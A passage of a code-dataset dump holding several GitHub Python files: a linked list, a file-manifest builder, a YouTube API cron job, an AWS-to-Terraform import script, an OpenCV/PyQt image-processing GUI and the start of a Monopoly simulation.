j,cluster in enumerate(clusters):\n # get row indexes for samples with this cluster\n row_ix_ = where(yhat == cluster)\n # create scatter of these samples\n pyplot.scatter(Y[row_ix_, 0], Y[row_ix_, 1],label=\"Cluster \"+str(j))\n # show the plot\n \n pyplot.xlabel(\"X position (arb.)\")\n pyplot.ylabel(\"Y position (arb.)\")\n pyplot.legend(loc=\"upper right\")\n \n \n pyplot.show()\n\n\n\n\n\n\n","repo_name":"Jacob-J-E/Y3Lab","sub_path":"Compton_Effect/Imaging/initial_guess_ML.py","file_name":"initial_guess_ML.py","file_ext":"py","file_size_in_byte":8051,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"32799902841","text":"\"\"\"Doubly linked list.\"\"\"\n\n\nclass Node(object):\n \"\"\"Node for a doubly linked list.\"\"\"\n\n __slots__ = ('object', 'next', 'prev')\n\n def __init__(self, obj):\n \"\"\"Initialize a node.\n\n :param obj: Object to be stored in a node.\n \"\"\"\n self.object = obj\n self.next = None\n self.prev = None\n\n\nclass DoublyLinkedList(object):\n \"\"\"Doubly linked list.\n\n It implements a linked data structure that consists of a set of\n sequentially linked records called nodes. Each node contains two fields,\n called links, that are references to the previous and to the next node\n in the sequence of nodes\n (see https://en.wikipedia.org/wiki/Doubly_linked_list).\n \"\"\"\n\n __slots__ = ('_first_node', '_last_node')\n\n def __init__(self):\n \"\"\"Initialize a list.\"\"\"\n super(DoublyLinkedList, self).__init__()\n\n self._first_node = None\n self._last_node = None\n\n @property\n def first_node(self):\n \"\"\"Get the first node in the list.\"\"\"\n return self._first_node\n\n @property\n def last_node(self):\n \"\"\"Get the last node in the list.\"\"\"\n return self._last_node\n\n def insert_beginning(self, new_node):\n \"\"\"Insert new node at the beginning of the list.\n\n :param new_node: New node to be inserted.\n \"\"\"\n if self._first_node is None:\n self._first_node = new_node\n self._last_node = new_node\n new_node.prev = None\n new_node.next = None\n else:\n self.insert_before(self._first_node, new_node)\n\n def insert_end(self, new_node):\n \"\"\"Insert new node at the end of the list.\n\n :param new_node: New node to be inserted.\n \"\"\"\n if self._last_node is None:\n self.insert_beginning(new_node)\n else:\n self.insert_after(self._last_node, new_node)\n\n def insert_after(self, node, new_node):\n \"\"\"Insert new node after the given one.\n\n :param node: A node after which the new one must be inserted.\n :param new_node: New node to be inserted.\n \"\"\"\n new_node.prev = node\n if node.next is None:\n new_node.next = None\n self._last_node = new_node\n else:\n new_node.next = node.next\n node.next.prev = new_node\n node.next = new_node\n\n def insert_before(self, node, new_node):\n \"\"\"Insert new node before the given one.\n\n :param node: A node before which the new one must be inserted.\n :param new_node: New node to be inserted.\n \"\"\"\n new_node.next = node\n if node.prev is None:\n new_node.prev = None\n self._first_node = new_node\n new_node.next.prev = new_node\n else:\n new_node.prev = node.prev\n node.prev.next = new_node\n node.prev = new_node\n\n def remove(self, node):\n \"\"\"Remove given node from the list.\n\n :param node: A node that must be removed.\n \"\"\"\n if node.prev is None:\n self._first_node = node.next\n else:\n node.prev.next = node.next\n\n if node.next is None:\n self._last_node = node.prev\n else:\n node.next.prev = node.prev\n","repo_name":"pgoltsev/interview","sub_path":"src/lru/structures/doubly_linked_list/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12928883680","text":"from abc import ABCMeta\nfrom datetime import datetime\nfrom hashlib import sha256\nfrom math import ceil\nfrom os import walk\nfrom pathlib import Path\n\nimport toml\n\nfrom .static import KILOBYTE, MEGABYTE, ALLOWED_CHUNK_SIZES\n\n\nclass PackagePath:\n \"\"\" Extends pathlib.Path adding some commonly used utility methods.\"\"\"\n\n def __init__(self, path: str):\n self.path = Path(path)\n\n def sha256sum(self) -> str:\n \"\"\"SHA256 Checksum of the file at self.path.\"\"\"\n hash_algo = sha256()\n buffer = bytearray(128 * KILOBYTE)\n buffer = memoryview(buffer)\n\n with open(self.path, \"rb\", buffering=0) as read_file:\n for chunk in iter(lambda: read_file.readinto(buffer), 0):\n hash_algo.update(buffer[:chunk])\n return hash_algo.hexdigest()\n\n def exists(self) -> bool:\n \"\"\"Checks if the file at self.path exists.\"\"\"\n return self.path.exists()\n\n def chunk_len(self, chunk_buffer_size: int) -> int: # TODO: rename count_chunks\n \"\"\"Counts the amount of buffer_size chunks a file can be divided by.\"\"\"\n\n return ceil(len(self) / chunk_buffer_size)\n\n @property\n def name(self) -> str:\n \"\"\"Returns the name of the file.\"\"\"\n return str(self.path.name)\n\n def __len__(self):\n return self.path.stat().st_size\n\n def __str__(self):\n return self.name\n\n def is_dir(self) -> bool:\n \"\"\"Returns True if the path leads to a directory.\"\"\"\n return self.path.is_dir()\n\n def is_file(self) -> bool:\n \"\"\"Returns True if the path leads to a file.\"\"\"\n return self.path.is_file()\n\n\nclass FileManifest(metaclass=ABCMeta):\n \"\"\"Provides basic functionality needed to build a file manifest.\"\"\"\n\n def __init__(self, target_path: str, chunk_buffer_size: int, *args, **kwargs):\n self.package_path = PackagePath(target_path)\n\n if chunk_buffer_size not in ALLOWED_CHUNK_SIZES:\n raise ValueError(\"{chunk_buffer_size} is not an allowed buffer size.\")\n\n self.chunk_buffer_size = chunk_buffer_size\n self.top_directory = None\n\n # Optional Stuff\n self.extras = dict()\n\n self.extras[\"creation_date\"] = str(datetime.now())\n self.extras[\"comment\"] = kwargs.get(\"comment\", None)\n self.extras[\"created_by\"] = kwargs.get(\"created_by\", None)\n\n self.extras = {\n k: v for k, v in self.extras.items() if v is not None\n } # removes none values\n\n def verify(self):\n \"\"\"Verifies all files in the manifest exist.\"\"\"\n for file_ in self:\n assert file_.exists() # TODO: Change to if execption\n\n def __repr__(self):\n return \"\\n\".join([f\"{key} : {value}\" for key, value in self.__dict__.items()])\n\n\nclass MultipleFileManifest(FileManifest):\n \"\"\"Extends FileManifest provides multi-file functionality.\"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n self.path_list = self.get_paths()\n self.top_directory = self.package_path.name\n\n def get_paths(self):\n \"\"\"Returns a list of all the files.\"\"\"\n paths_list = []\n for directory, _, files in walk(self.package_path.path):\n for file_ in files:\n current_path = PackagePath(f\"{directory}/{file_}\")\n assert current_path.exists() # TODO: Change to if exeption\n paths_list.append(current_path)\n return paths_list\n\n def __iter__(self):\n return iter(self.path_list)\n\n\n# IDEA Custom Multi File Manifest Class\n# Initailly makes a custom named top directory.\n# Next, it finds the absolute path to all the choosen files and creates symlinks\n# to the files in the custom top directory.\n# uses os.walk followlinks=True options to walk symbolic links that resolve to dirs.\n\n\nclass SingleFileManifest(FileManifest):\n \"\"\"Extends FileManifest provides single file functionality.\"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n @property\n def name(self):\n return str(self.package_path)\n\n def __iter__(self):\n return iter([self.package_path])\n\n\nclass ManifestMaker:\n \"\"\"Factory class provides functions to build a manifest.\"\"\"\n\n def create(target_path: str, chunk_buffer_size: int, *args, **kwargs):\n \"\"\"Creates file manifest from the target_path.\"\"\"\n path = Path(target_path)\n\n assert path.exists() # TODO: Change if exception\n\n if path.is_dir():\n return MultipleFileManifest(target_path, chunk_buffer_size, *args, **kwargs)\n\n if path.is_file():\n return SingleFileManifest(target_path, chunk_buffer_size, *args, **kwargs)\n\n def write(manifest: FileManifest, destination: str, chunk_buffer_size: int):\n \"\"\"Writes file manifest of files to the destination.\"\"\"\n\n manifest.verify()\n\n header = dict()\n file_list = []\n master_hash = \"\"\n\n header.update(manifest.extras)\n header[\"chunk_buffer_size\"] = chunk_buffer_size\n\n if manifest.top_directory:\n header[\"top_directory\"] = manifest.top_directory\n\n for current_file in manifest:\n\n manifest = dict()\n manifest[\"name\"] = current_file.name\n manifest[\"path\"] = str(current_file.path)\n\n file_hash = current_file.sha256sum()\n master_hash += file_hash\n\n manifest[\"hash\"] = file_hash\n manifest[\"chunks\"] = current_file.chunk_len(chunk_buffer_size)\n\n file_list.append(manifest)\n\n header[\"master_hash\"] = master_hash\n\n destination_path = Path(destination)\n destination_path.touch()\n\n with open(destination_path, mode=\"a\") as destination_file:\n data = toml.dumps({\"header\": header})\n\n destination_file.write(data)\n destination_file.write(\"\\n\")\n\n for file_information in file_list:\n name = file_information.pop(\"name\")\n data = toml.dumps({name: file_information})\n\n destination_file.write(data)\n destination_file.write(\"\\n\")\n","repo_name":"dgnsrekt/g-packer","sub_path":"g_packer/manifest.py","file_name":"manifest.py","file_ext":"py","file_size_in_byte":6118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18131166063","text":"from datetime import datetime\nfrom .models import Video\nimport requests\nfrom config import SECRETS\n\ndef my_scheduled_job():\n pageToken = \"\"\n for _ in range(10):\n headers = {\n 'Accept': 'application/json',\n }\n params = {\n 'key': SECRETS['YOUTUBE_API_KEYS'][0],\n 'part': 'snippet',\n 'maxResults': 50,\n 'order': 'date',\n 'type': 'video',\n 'publishedAfter': '2020-01-01T00:00:00Z',\n 'q': 'education',\n 'pageToken': pageToken\n }\n for attempt in range(len(SECRETS['YOUTUBE_API_KEYS'])):\n try:\n response = requests.get('https://youtube.googleapis.com/youtube/v3/search', headers=headers, params=params)\n response_json = response.json()\n print(response_json)\n if (\"error\" in response_json): raise Exception(\"unhandlable response\")\n except:\n params['key']=SECRETS['YOUTUBE_API_KEYS'][attempt+1]\n else:\n pageToken = response_json['nextPageToken']\n for item in response_json['items']:\n video = Video(\n video_id = item['id']['videoId'], \n title = item['snippet']['title'],\n description = item['snippet']['description'],\n etag = item['etag'],#signifies change\n channel_id = item['snippet']['channelId'],\n channel_title = item['snippet']['channelTitle'],\n published_at = datetime.strptime(item['snippet']['publishedAt'], \"%Y-%m-%dT%H:%M:%SZ\"),\n thumbnail_url = item['snippet']['thumbnails']['default']['url']\n )\n video.save()\n break\n\n \n","repo_name":"alok760/youtube_explore","sub_path":"youtube_explore/cron.py","file_name":"cron.py","file_ext":"py","file_size_in_byte":1859,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"72718024466","text":"#!/usr/bin/python3\nimport sys\nimport subprocess\nimport os\nimport json\nimport argparse\nimport sys\n\npref=\"Vpcs\"\nttft=\"aws_vpc\"\nidfilt=\"VpcId\"\n\n\nif sys.version_info<(3,6,0):\n sys.stderr.write(\"You need python 3.6 or later to run this script\\n\")\n exit(1)\n\n\nnargs=len(sys.argv)\n#print('Argument List:', str(sys.argv))\n#print('Argument 1:', sys.argv[0])\nif nargs==1:\n cmd=\"$AWS ec2 describe-vpcs\"\nelif nargs==2:\n id=str(sys.argv[1])\n cmd=\"$AWS ec2 describe-vpcs --vpc-ids \"+ id\nelse:\n print(\"error: too many args\")\n exit()\nprint(cmd)\n\n\n\n#out = subprocess.run('aws configure get region', shell=True, capture_output=True)\n#region=out.stdout.decode().rstrip()\n#print(region)\n\nout = subprocess.run(cmd, shell=True, capture_output=True)\nol=len(out.stdout.decode().rstrip())\nif ol==0:\n print(\"No return from command exit ...\")\n exit()\nprint(\"ol=\"+str(ol))\nprint(out.stdout.decode().rstrip())\n\n\njs=json.loads(out.stdout.decode().rstrip())\nprint(json.dumps(js, indent=4, separators=(',', ': ')))\nawsout=js[pref]\n\nprint(json.dumps(awsout, indent=4, separators=(',', ': ')))\ncount=len(awsout)\nprint(count)\nif count > 0:\n for i in range(0,count):\n cname=awsout[i][idfilt]\n print(cname)\n rname=cname.replace(\":\",\"_\")\n rname=rname.replace(\".\",\"_\")\n rname=rname.replace(\"\\\\\",\"_\")\n #print(rname)\n fn=ttft+\"__\"+rname+\".tf\"\n #print(fn)\n if os.path.isfile(fn):\n print(fn+\" exists continuing..\")\n continue\n print(ttft+\" \"+cname+\" import\")\n\n \n cmd ='terraform import '+ttft+'.'+rname+' \"' + cname+ '\" > /dev/null'\n print(cmd)\n out = subprocess.run(cmd, shell=True, capture_output=True)\n ol=len(out.stdout.decode().rstrip())\n if ol==0:\n print(\"No return from command exit ...\")\n exit()\n print(\"ol=\"+str(ol))\n print(out.stdout.decode().rstrip())\n\n cmd ='terraform state show '+ttft+'.'+rname+' > '+ttft+'-'+rname+'-2.txt'\n print(cmd)\n out = subprocess.run(cmd, shell=True, capture_output=True)\n ol=len(out.stdout.decode().rstrip())\n if ol==0:\n print(\"No return from command exit ...\")\n exit()\n print(\"ol=\"+str(ol))\n print(out.stdout.decode().rstrip())\n\n cmd =\"cat \"+ttft+\"-\"+rname+\"-2.txt | perl -pe 's/\\x1b.*?[mGKH]//g' > \"+ttft+\"-\"+rname+\"-1.txt\"\n print(cmd)\n out = subprocess.run(cmd, shell=True, capture_output=True)\n ol=len(out.stdout.decode().rstrip())\n if ol==0:\n print(\"No return from command exit ...\")\n exit()\n print(\"ol=\"+str(ol))\n print(out.stdout.decode().rstrip())\n\n file=ttft+'-'+rname+'-1.txt'\n print(file)\n \n\nexit()\n\"\"\"\n \n echo $aws2tfmess > $fn\n while IFS= read line\n do\n\t\t\t\tskip=0\n # display $line or do something with $line\n t1=`echo \"$line\"`\n if [[ ${t1} == *\"=\"* ]];then\n tt1=`echo \"$line\" | cut -f1 -d'=' | tr -d ' '` \n tt2=`echo \"$line\" | cut -f2- -d'='`\n if [[ ${tt1} == \"arn\" ]];then skip=1; fi \n if [[ ${tt1} == \"id\" ]];then skip=1; fi \n if [[ ${tt1} == \"role_arn\" ]];then skip=1;fi\n if [[ ${tt1} == \"allocated_capacity\" ]];then skip=1;fi\n if [[ ${tt1} == \"dhcp_options_id\" ]];then skip=1;fi\n if [[ ${tt1} == \"main_route_table_id\" ]];then skip=1;fi\n if [[ ${tt1} == \"default_security_group_id\" ]];then skip=1;fi\n if [[ ${tt1} == \"default_route_table_id\" ]];then skip=1;fi\n if [[ ${tt1} == \"owner_id\" ]];then skip=1;fi\n if [[ ${tt1} == \"default_network_acl_id\" ]];then skip=1;fi\n if [[ ${tt1} == \"ipv6_association_id\" ]];then skip=1;fi\n if [[ ${tt1} == \"ipv6_cidr_block\" ]];then skip=1;fi\n fi\n if [ \"$skip\" == \"0\" ]; then\n #echo $skip $t1\n echo \"$t1\" >> $fn\n fi\n \n done <\"$file\"\n \n\n dfn=`printf \"data/data_%s__%s.tf\" $ttft $cname`\n printf \"data \\\"%s\\\" \\\"%s\\\" {\\n\" $ttft $cname > $dfn\n printf \"id = \\\"%s\\\"\\n\" $cname >> $dfn\n printf \"}\\n\" $ttft $cname >> $dfn\n \n done\n fi\ndone\n\nrm -f *.backup\n\"\"\"","repo_name":"gilyas/aws-to-terraform-scripts","sub_path":"scripts/100-get-vpc.py","file_name":"100-get-vpc.py","file_ext":"py","file_size_in_byte":4506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13015477477","text":"\nimport sys\nimport cv2\nimport math\nfrom PyQt5 import QtWidgets\nfrom PyQt5.QtCore import pyqtSlot\nfrom PyQt5.QtGui import QImage ,QPixmap\nfrom PyQt5.QtWidgets import QMainWindow, QFileDialog\nfrom PyQt5.uic import loadUi\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\n\nclass ShowImage(QMainWindow):\n\n\n def __init__(self):\n super(ShowImage, self).__init__()\n loadUi('untitled.ui',self)\n self.image = None\n self.pushButton.clicked.connect(self.loadClicked)\n self.grayButton.clicked.connect(self.grayClicked)\n self.actionBrightness.triggered.connect(self.actionbrightness)\n self.actionSimple_Contrast.triggered.connect(self.actionContrast)\n self.actionContrast_Stretching.triggered.connect(self.actionContrast2)\n self.actionNegative_Image.triggered.connect(self.actionNegativeI)\n self.actionBiner_Image.triggered.connect(self.actionBinerI)\n self.actionHistogram_Grayscale.triggered.connect(self.actionGrayH)\n self.actionRGB_Histogram.triggered.connect(self.actionRGBH)\n self.actionHistogram_Equalization.triggered.connect(self.actionEqualH)\n self.actionTranslasi.triggered.connect(self.actiontranslasi)\n self.action_45_Derajat.triggered.connect(self.actionmin45)\n self.action45_Derajat.triggered.connect(self.action45)\n self.action_90_Derajat.triggered.connect(self.actionmin90)\n self.action90_Derajat.triggered.connect(self.action90)\n self.action180_Derajat.triggered.connect(self.action180)\n self.actionZoom_in.triggered.connect(self.actionZoomin)\n self.actionZoom_out.triggered.connect(self.actionZoomout)\n self.actionSkewed_Image.triggered.connect(self.actionSkewedImage)\n self.actionCrop.triggered.connect(self.cropClicked)\n self.actionKonvolusi.triggered.connect(self.filteringClicked)\n self.actionMeanFilter.triggered.connect(self.meanfilter)\n self.actionGaussian_Filter.triggered.connect(self.gaussian)\n self.actionSharping.triggered.connect(self.sharpening)\n self.actionMedian_Filtering.triggered.connect(self.median)\n self.actionMax_Filtering.triggered.connect(self.maxfilter)\n\n @pyqtSlot()\n def filteringClicked(self):\n img = cv2.imread('jantung.jpg')\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n # x, y = gray.shape[:2]\n # kernel = np.ones((5, 5), np.float32)/25\n # h = 5 / 2\n # w = 5 / 2\n img_out = cv2.blur(gray, (5, 5))\n # img_out = cv2.fulter2D(gray, -1, kernel)\n # for i in np.arange(h):\n # for j in np.arange(w):\n # sum = 0\n # for k in -h to h:\n # for l in -w to w:\n # a = gray[i+k, j+1]\n # w = img_out(h = k, w = 1)\n # sum = sum + (w*a)\n # out[i,j] = sum\n plt.imshow(img_out, cmap='gray', interpolation='bicubic')\n plt.xticks([], plt.yticks([]))\n plt.show()\n\n def meanfilter(self):\n img = cv2.imread('jantung.jpg')\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n kernel = np.array([[1 / 4, 1 / 4], [1 / 4, 1 / 4]])\n img_out = cv2.filter2D(gray, -1, kernel)\n plt.imshow(img_out, cmap='gray', interpolation='bicubic')\n plt.xticks([], plt.yticks([]))\n plt.show()\n\n def gaussian(self):\n img = cv2.imread('jantung.jpg')\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n # kernel =\n img_out = cv2.GaussianBlur(gray, (5, 5), 0)\n plt.imshow(img_out, cmap='gray', interpolation='bicubic')\n plt.xticks([], plt.yticks([]))\n plt.show()\n\n def sharpening(self):\n img = cv2.imread('jantung.jpg')\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n kernel = np.array([[0, -1, 0], [-1, 5, -1], [0, -1, 0]])\n img_out = cv2.filter2D(gray, -1, kernel)\n plt.imshow(img_out, cmap='gray', interpolation='bicubic')\n plt.xticks([], plt.yticks([]))\n plt.show()\n\n def median(self):\n img = cv2.imread('jantung.jpg')\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n # kernel =\n img_out = cv2.medianBlur(gray, 5)\n plt.imshow(img_out, cmap='gray', interpolation='bicubic')\n plt.xticks([], plt.yticks([]))\n plt.show()\n cv2.dilate(gray, cv2.getStructuringElement(cv2.MORPH_RECT, (5, 5)))\n\n def maxfilter(self):\n img = cv2.imread('jantung.jpg')\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n # kernel =\n img_out = cv2.dilate(gray, cv2.getStructuringElement(cv2.MORPH_RECT, (5, 5)))\n plt.imshow(img_out, cmap='gray', interpolation='bicubic')\n plt.xticks([], plt.yticks([]))\n plt.show()\n\n def actionbrightness(self):\n img = cv2.imread('jantung.jpg')\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n brightness = self.horizontalSlider.value()\n h, w = gray.shape[:2]\n for i in np.arange(h):\n for j in np.arange(w):\n a = gray.item(i, j)\n b = a + brightness\n if b > 255:\n b = 255\n elif b < 0:\n b = 0\n else:\n b = b\n gray.itemset((i, j), b)\n self.image = gray\n self.displayImage(2)\n\n def actionContrast(self):\n img = cv2.imread('jantung.jpg')\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n contrast = self.horizontalSlider_2.value ()\n h, w = gray.shape[:2]\n for i in np.arange(h):\n for j in np.arange(w):\n a = gray.item(i, j)\n b = np.math.ceil(a * contrast)\n if b > 255:\n b = 255\n elif b < 0:\n b = 0\n else:\n b = b\n gray.itemset((i, j), b)\n self.image = gray\n self.displayImage(2)\n\n def actionContrast2(self):\n img = cv2.imread('jantung.jpg')\n H, W = img.shape[:2]\n gray = np.zeros((H, W), np.uint8)\n for i in range(H):\n for j in range(W):\n gray[i, j] = np.clip(0.299 * img[i, j, 0] + 0.587 * img[i, j, 1] + 0.114 * img[i, j, 2], 0, 255)\n a = gray[i, j]\n if a > 255:\n a = 255\n elif a < 0:\n a = 0\n else:\n a = a\n b = np.math.ceil(((a - 255) / (255 - 0)) * 255)\n gray.itemset((i, j), b)\n self.image = gray\n self.displayImage(2)\n\n def actionNegativeI(self):\n img = cv2.imread('jantung.jpg')\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n max_intensity = 255\n h, w = gray.shape[:2]\n for i in np.arange(h):\n for j in np.arange(w):\n a = gray.item(i, j)\n b = max_intensity - a\n if b > 255:\n b = 255\n elif b < 0:\n b = 0\n else:\n b = b\n gray.itemset((i, j), b)\n self.image = gray\n self.displayImage(2)\n\n def actionBinerI(self):\n img = cv2.imread('jantung.jpg')\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n a1 = 150\n a2 = 50\n h, w = gray.shape[:2]\n for i in np.arange(h):\n for j in np.arange(w):\n a = gray.item(i, j)\n if a < a1:\n a = a1\n elif a >= a2:\n a = a2\n else:\n a = a\n gray.itemset((i, j), a)\n self.image = gray\n self.displayImage(2)\n\n def actionGrayH(self):\n img = cv2.imread('jantung.jpg')\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n h, w = gray.shape[:2]\n for i in np.arange(h):\n for j in np.arange(w):\n a = gray.item(i, j)\n gray.itemset((i, j), a)\n self.image = gray\n self.displayImage(2)\n plt.hist(gray.ravel(), 255, [0, 255])\n plt.show()\n\n def actionRGBH(self):\n img = cv2.imread('jantung.jpg')\n color = ('b', 'g', 'r')\n for i, col in enumerate(color):\n histo = cv2.calcHist([img], [i], None, [256], [0, 256])\n plt.plot(histo, color = col)\n plt.xlim([0, 256])\n plt.show()\n\n def actionEqualH(self):\n img = cv2.imread('jantung.jpg')\n hist, bins = np.histogram(img.flatten(), 256, [0, 256])\n cdf = hist.cumsum()\n cdf_normalized = cdf * hist.max() / cdf.max()\n cdf_m = np.ma.masked_equal(cdf, 0)\n cdf_m = (cdf_m - cdf_m.min()) * 255 / (cdf_m.max() - cdf_m.min())\n cdf = np.ma.filled(cdf_m, 0).astype('uint8')\n self.image = cdf[img]\n self.displayImage(2)\n\n plt.plot(cdf_normalized, color = 'b')\n plt.hist(img.flatten(), 256, [0, 256], color = 'r')\n plt.xlim([0, 256])\n plt.legend(('cdf', 'histogram'), loc = 'upper left')\n plt.show()\n\n def actiontranslasi(self):\n img = cv2.imread('jantung.jpg')\n h,w = img.shape[:2]\n quarter_h, quarter_w = h/4, w/4\n T = np.float32([[1, 0, quarter_w], [0, 1, quarter_h]])\n gray = cv2.warpAffine(img, T, (w, h))\n self.image = gray\n self.displayImage(2)\n\n def actionmin45(self):\n img = cv2.imread('jantung.jpg')\n h, w = self.image.shape[:2]\n\n rotationMatrix = cv2.getRotationMatrix2D((w/2, h/2), -45, .7)\n cos = np.abs(rotationMatrix[0, 0])\n sin = np.abs(rotationMatrix[0, 1])\n\n nW = int((h*sin) + (w*cos))\n nH = int((h*cos) + (w*sin))\n\n rotationMatrix[0, 2] += (nW/2) - w/2\n rotationMatrix[1, 2] += (nH/2) - h/2\n\n rot_image = cv2.warpAffine(img, rotationMatrix, (h, w))\n self.image=rot_image\n self.displayImage(1)\n\n def action45(self):\n img = cv2.imread('jantung.jpg')\n h, w = self.image.shape[:2]\n\n rotationMatrix = cv2.getRotationMatrix2D((w / 2, h / 2), 45, .7)\n cos = np.abs(rotationMatrix[0, 0])\n sin = np.abs(rotationMatrix[0, 1])\n\n nW = int((h * sin) + (w * cos))\n nH = int((h * cos) + (w * sin))\n\n rotationMatrix[0, 2] += (nW / 2) - w / 2\n rotationMatrix[1, 2] += (nH / 2) - h / 2\n\n rot_image = cv2.warpAffine(img, rotationMatrix, (h, w))\n self.image = rot_image\n self.displayImage(1)\n\n def actionmin90(self):\n img = cv2.imread('jantung.jpg')\n h, w = self.image.shape[:2]\n\n rotationMatrix = cv2.getRotationMatrix2D((w / 2, h / 2), -90, 1)\n cos = np.abs(rotationMatrix[0, 0])\n sin = np.abs(rotationMatrix[0, 1])\n\n nW = int((h * sin) + (w * cos))\n nH = int((h * cos) + (w * sin))\n\n rotationMatrix[0, 2] += (nW / 2) - w / 2\n rotationMatrix[1, 2] += (nH / 2) - h / 2\n\n rot_image = cv2.warpAffine(img, rotationMatrix, (h, w))\n self.image = rot_image\n self.displayImage(1)\n\n def action90(self):\n img = cv2.imread('jantung.jpg')\n h, w = self.image.shape[:2]\n\n rotationMatrix = cv2.getRotationMatrix2D((w / 2, h / 2), 90, 1)\n cos = np.abs(rotationMatrix[0, 0])\n sin = np.abs(rotationMatrix[0, 1])\n\n nW = int((h * sin) + (w * cos))\n nH = int((h * cos) + (w * sin))\n\n rotationMatrix[0, 2] += (nW / 2) - w / 2\n rotationMatrix[1, 2] += (nH / 2) - h / 2\n\n rot_image = cv2.warpAffine(img, rotationMatrix, (h, w))\n self.image = rot_image\n self.displayImage(1)\n\n def action180(self):\n img = cv2.imread('jantung.jpg')\n h, w = self.image.shape[:2]\n\n rotationMatrix = cv2.getRotationMatrix2D((w / 2, h / 2), 180, 1)\n cos = np.abs(rotationMatrix[0, 0])\n sin = np.abs(rotationMatrix[0, 1])\n\n nW = int((h * sin) + (w * cos))\n nH = int((h * cos) + (w * sin))\n\n rotationMatrix[0, 2] += (nW / 2) - w / 2\n rotationMatrix[1, 2] += (nH / 2) - h / 2\n\n rot_image = cv2.warpAffine(img, rotationMatrix, (h, w))\n self.image = rot_image\n self.displayImage(1)\n\n def actionZoomin(self):\n img = cv2.imread('jantung.jpg')\n resize_img=cv2.resize(img,None,fx=2,fy=2,interpolation=cv2.INTER_CUBIC)\n cv2.imshow('Zoom in', resize_img)\n\n def actionZoomout(self):\n img = cv2.imread('jantung.jpg')\n resize_img = cv2.resize(img,None,fx=0.50,fy=0.50)\n cv2.imshow('Zoom out', resize_img)\n\n def actionSkewedImage(self):\n img = cv2.imread('jantung.jpg')\n resize_img=cv2.resize(img,(900,400),interpolation=cv2.INTER_AREA)\n cv2.imshow('Skewed Image',resize_img)\n\n def cropClicked(self):\n #img = cv2.imread('jantung.jpg.jpg')\n x1 = 30\n y1 = 30\n x2 = 250\n y2 = 250\n img = self.image[x1:x2, y1:y2]\n cv2.imshow('Crop', img)\n\n def saveClicked(self):\n flname, filter = QFileDialog.getSaveFileName(self, 'Save File', 'D:\\\\', \"Image Files (*.jpg)\")\n if flname:\n cv2.imwrite(flname, self.image)\n else:\n print('error')\n\n def loadClicked(self):\n self.loadImage('AB.jpg')\n\n def grayClicked(self):\n H, W = self.image.shape[:2]\n gray = np.zeros((H, W), np.uint8)\n for i in range (H):\n for j in range (W):\n gray[i,j]= np.clip(0.299 * self.image[i, j, 0] + 0.587 * self.image[i, j, 1] + 0.114 * self.image[i, j, 2], 0, 255)\n self.image = gray\n self.displayImage(2)\n\n def loadImage(self,flname):\n self.image = cv2.imread(flname, cv2.IMREAD_COLOR)\n self.displayImage()\n\n def displayImage(self, windows=1):\n qformat = QImage.Format_Indexed8\n img = QImage(self.image, self.image.shape[1], self.image.shape[0], self.image.strides[0], qformat)\n img = img.rgbSwapped()\n if windows == 1:\n self.imgLabel.setPixmap(QPixmap.fromImage(img))\n self.imgLabel.setScaledContents(True)\n if windows == 2:\n self.hasilLabel.setPixmap(QPixmap.fromImage(img))\n self.hasilLabel.setScaledContents(True)\n\n if len(self.image.shape) == 3:\n if (self.image.shape[2]) == 4:\n qformat = QImage.Format_RGBA8888\n\n else:\n qformat = QImage.Format_RGB888\n img = QImage(self.image, self.image.shape[1], self.image.shape[0], self.image.strides[0], qformat)\n\n img = img.rgbSwapped()\n\n self.imgLabel.setPixmap(QPixmap.fromImage(img))\n\napp = QtWidgets.QApplication(sys.argv)\nwindow = ShowImage()\nwindow.setWindowTitle('Show Image GUI')\nwindow.show()\nsys.exit(app.exec_())\n","repo_name":"ilham-ilo/Catering-Online","sub_path":"D6/D6/D6.py","file_name":"D6.py","file_ext":"py","file_size_in_byte":14830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14091993811","text":"# Game Actions\nimport pandas as pd\nimport random\nfrom card import *\nfrom player import *\n\ndef loadBoard():\n \"\"\" Loads board in a dataframe \"\"\"\n\n board = pd.read_csv(\"board.csv\")\n board['visits'] = 0\n board['owned'] = False\n return board\n\ndef loadCards():\n \"\"\" Loads Chance & Community Chest card info \"\"\"\n\n chanceDeck = []\n communityDeck = []\n chance = pd.read_csv(\"chance.csv\", engine='python')\n chest = pd.read_csv(\"communityChest.csv\", engine='python')\n\n for i in range(chance.shape[0]):\n card = Card(chance,i)\n chanceDeck.append(card)\n \n for i in range(chest.shape[0]):\n card = Card(chest,i)\n communityDeck.append(card)\n\n return chanceDeck, communityDeck\n\ndef createPlayers(n):\n \"\"\" Create n players for game \"\"\"\n\n players = []\n for i in range(1,n+1):\n pName = 'p' + str(i)\n p = Player(pName)\n players.append(p)\n\n return players\n\ndef visitSimulations(players, board, communityCards, chanceCards, nTurns, nGames):\n \"\"\" Performs simulations on object \"\"\"\n for i in range(1,nGames+1):\n print(f'\\n=== Game #{i} ===')\n for t in range(1, nTurns + 1):\n for p in players:\n print(f'\\n=== {p.name} Turn 